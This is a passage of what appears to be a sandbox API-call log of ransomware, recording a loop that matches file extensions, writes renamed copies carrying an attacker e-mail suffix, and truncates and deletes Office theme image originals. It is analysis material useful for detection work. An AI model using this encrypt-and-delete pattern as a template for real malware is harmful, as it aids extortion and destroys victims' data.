lpString2=".GIF") returned 1 [0048.524] lstrlenW (lpString=".xls") returned 4 [0048.524] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.524] lstrlenW (lpString=".xlsx") returned 5 [0048.524] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.524] lstrlenW (lpString=".ppt") returned 4 [0048.524] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.525] lstrlenW (lpString=".zip") returned 4 [0048.525] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.525] lstrlenW (lpString=".rar") returned 4 [0048.525] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.525] lstrlenW (lpString=".bz2") returned 4 [0048.525] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.525] lstrlenW (lpString=".7z") returned 3 [0048.525] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.525] lstrlenW (lpString=".dbf") returned 4 [0048.525] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.525] lstrlenW (lpString=".1cd") returned 4 [0048.525] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.525] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF") returned 76 [0048.525] lstrlenW (lpString=".jpg") returned 4 [0048.525] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.525] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.525] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.525] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.526] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1009) returned 1 [0048.526] CloseHandle (hObject=0x20c) returned 1 [0048.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 0x20 [0048.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.526] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.526] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.528] GetLastError () returned 0x0 [0048.528] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x3f1, lpOverlapped=0x0) returned 1 [0048.530] WriteFile (in: hFile=0x224, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x400, lpOverlapped=0x0) returned 1 [0048.531] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.532] WriteFile (in: hFile=0x224, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.532] SetEndOfFile (hFile=0x224) returned 1 [0048.532] CloseHandle (hObject=0x224) returned 1 [0048.532] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.532] SetEndOfFile (hFile=0x20c) returned 1 [0048.533] CloseHandle (hObject=0x20c) returned 1 [0048.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.533] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 1 [0048.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.533] lstrlenW (lpString=".doc") returned 4 [0048.533] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.533] lstrlenW (lpString=".docx") returned 5 [0048.533] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.533] lstrlenW (lpString=".pdf") returned 4 [0048.533] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.533] lstrlenW (lpString=".xls") returned 4 [0048.533] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.533] lstrlenW (lpString=".xlsx") returned 5 [0048.533] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.533] lstrlenW (lpString=".ppt") returned 4 [0048.533] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.533] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.533] lstrlenW (lpString=".zip") returned 4 [0048.534] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.534] lstrlenW (lpString=".rar") returned 4 [0048.534] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.534] lstrlenW (lpString=".bz2") returned 4 [0048.534] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.534] lstrlenW (lpString=".7z") returned 3 [0048.534] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.534] lstrlenW (lpString=".dbf") returned 4 [0048.534] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.534] lstrlenW (lpString=".1cd") returned 4 [0048.534] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.534] lstrlenW (lpString=".jpg") returned 4 [0048.534] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.534] lstrlenW (lpString=".doc") returned 4 [0048.534] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.534] lstrlenW (lpString=".docx") returned 5 [0048.534] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.534] lstrlenW (lpString=".pdf") returned 4 [0048.534] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.534] lstrlenW (lpString=".xls") returned 4 [0048.534] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.534] lstrlenW (lpString=".xlsx") returned 5 [0048.534] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.534] lstrlenW (lpString=".ppt") returned 4 [0048.534] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.534] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.534] lstrlenW (lpString=".zip") returned 4 [0048.534] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.534] lstrlenW (lpString=".rar") returned 4 [0048.534] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.535] lstrlenW (lpString=".bz2") returned 4 [0048.535] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.535] lstrlenW (lpString=".7z") returned 3 [0048.535] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.535] lstrlenW (lpString=".dbf") returned 4 [0048.535] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.535] lstrlenW (lpString=".1cd") returned 4 [0048.535] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.535] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0048.535] lstrlenW (lpString=".jpg") returned 4 [0048.535] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.535] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0048.535] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.535] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.535] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=27177) returned 1 [0048.535] CloseHandle (hObject=0x20c) returned 1 [0048.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 0x20 [0048.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.536] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.536] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.536] GetLastError () returned 0x0 [0048.536] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x6a29, lpOverlapped=0x0) returned 1 [0048.538] WriteFile (in: hFile=0x224, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x6a30, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x6a30, lpOverlapped=0x0) returned 1 [0048.539] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.539] WriteFile (in: hFile=0x224, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.539] SetEndOfFile (hFile=0x224) returned 1 [0048.539] CloseHandle (hObject=0x224) returned 1 [0048.540] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.540] SetEndOfFile (hFile=0x20c) returned 1 [0048.542] CloseHandle (hObject=0x20c) returned 1 [0048.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.543] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 1 [0048.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.543] lstrlenW (lpString=".doc") returned 4 [0048.543] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.543] lstrlenW (lpString=".docx") returned 5 [0048.543] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.543] lstrlenW (lpString=".pdf") returned 4 [0048.543] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.543] lstrlenW (lpString=".xls") returned 4 [0048.543] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.543] lstrlenW (lpString=".xlsx") returned 5 [0048.543] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.543] lstrlenW (lpString=".ppt") returned 4 [0048.543] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.543] lstrlenW (lpString=".zip") returned 4 [0048.543] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.543] lstrlenW (lpString=".rar") returned 4 [0048.543] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.543] lstrlenW (lpString=".bz2") returned 4 [0048.543] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.543] lstrlenW (lpString=".7z") returned 3 [0048.543] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.543] lstrlenW (lpString=".dbf") returned 4 [0048.543] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.543] lstrlenW (lpString=".1cd") returned 4 [0048.543] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.544] lstrlenW (lpString=".jpg") returned 4 [0048.544] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.544] lstrlenW (lpString=".doc") returned 4 [0048.544] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.544] lstrlenW (lpString=".docx") returned 5 [0048.544] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.544] lstrlenW (lpString=".pdf") returned 4 [0048.544] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.544] lstrlenW (lpString=".xls") returned 4 [0048.544] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.544] lstrlenW (lpString=".xlsx") returned 5 [0048.544] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.544] lstrlenW (lpString=".ppt") returned 4 [0048.544] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.544] lstrlenW (lpString=".zip") returned 4 [0048.544] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.544] lstrlenW (lpString=".rar") returned 4 [0048.544] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.544] lstrlenW (lpString=".bz2") returned 4 [0048.544] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.544] lstrlenW (lpString=".7z") returned 3 [0048.544] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.544] lstrlenW (lpString=".dbf") returned 4 [0048.544] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.544] lstrlenW (lpString=".1cd") returned 4 [0048.544] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.544] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0048.544] lstrlenW (lpString=".jpg") returned 4 [0048.544] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.545] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0048.545] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.545] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2209) returned 1 [0048.545] CloseHandle (hObject=0x20c) returned 1 [0048.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 0x20 [0048.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.545] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.545] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.545] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.547] GetLastError () returned 0x0 [0048.547] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x8a1, lpOverlapped=0x0) returned 1 [0048.886] WriteFile (in: hFile=0x224, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x8b0, lpOverlapped=0x0) returned 1 [0048.887] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0048.887] WriteFile (in: hFile=0x224, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.887] SetEndOfFile (hFile=0x224) returned 1 [0048.887] CloseHandle (hObject=0x224) returned 1 [0048.887] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0048.887] SetEndOfFile (hFile=0x20c) returned 1 [0048.888] CloseHandle (hObject=0x20c) returned 1 [0048.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0048.890] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 1 [0048.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.890] lstrlenW (lpString=".doc") returned 4 [0048.890] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.890] lstrlenW (lpString=".docx") returned 5 [0048.890] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.890] lstrlenW (lpString=".pdf") returned 4 [0048.890] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.890] lstrlenW (lpString=".xls") returned 4 [0048.890] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.890] lstrlenW (lpString=".xlsx") returned 5 [0048.890] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.890] lstrlenW (lpString=".ppt") returned 4 [0048.890] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.890] lstrlenW (lpString=".zip") returned 4 [0048.890] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.890] lstrlenW (lpString=".rar") returned 4 [0048.890] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.890] lstrlenW (lpString=".bz2") returned 4 [0048.890] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.891] lstrlenW (lpString=".7z") returned 3 [0048.891] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.891] lstrlenW (lpString=".dbf") returned 4 [0048.891] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.891] lstrlenW (lpString=".1cd") returned 4 [0048.891] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.891] lstrlenW (lpString=".jpg") returned 4 [0048.891] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.891] lstrlenW (lpString=".doc") returned 4 [0048.891] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.891] lstrlenW (lpString=".docx") returned 5 [0048.891] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.891] lstrlenW (lpString=".pdf") returned 4 [0048.891] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.891] lstrlenW (lpString=".xls") returned 4 [0048.891] lstrcmpiW 